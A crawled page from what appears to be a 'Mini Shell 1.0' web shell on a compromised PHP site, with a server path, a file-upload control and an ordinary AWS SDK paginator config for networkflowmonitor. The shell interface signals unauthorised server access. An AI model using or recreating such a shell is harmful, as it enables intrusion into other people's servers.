HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/cwd/vendor/aws/aws-sdk-php/src/data/networkflowmonitor/2023-04-19/
Upload File :
Current File : //proc/self/cwd/vendor/aws/aws-sdk-php/src/data/networkflowmonitor/2023-04-19/paginators-1.json.php
<?php
// This file was auto-generated from sdk-root/src/data/networkflowmonitor/2023-04-19/paginators-1.json
return [ 'pagination' => [ 'GetQueryResultsMonitorTopContributors' => [ 'input_token' => 'nextToken', 'output_token' => 'nextToken', 'limit_key' => 'maxResults', 'result_key' => 'topContributors', ], 'GetQueryResultsWorkloadInsightsTopContributors' => [ 'input_token' => 'nextToken', 'output_token' => 'nextToken', 'limit_key' => 'maxResults', 'result_key' => 'topContributors', ], 'GetQueryResultsWorkloadInsightsTopContributorsData' => [ 'input_token' => 'nextToken', 'output_token' => 'nextToken', 'limit_key' => 'maxResults', 'result_key' => 'datapoints', ], 'ListMonitors' => [ 'input_token' => 'nextToken', 'output_token' => 'nextToken', 'limit_key' => 'maxResults', 'result_key' => 'monitors', ], 'ListScopes' => [ 'input_token' => 'nextToken', 'output_token' => 'nextToken', 'limit_key' => 'maxResults', 'result_key' => 'scopes', ], ],];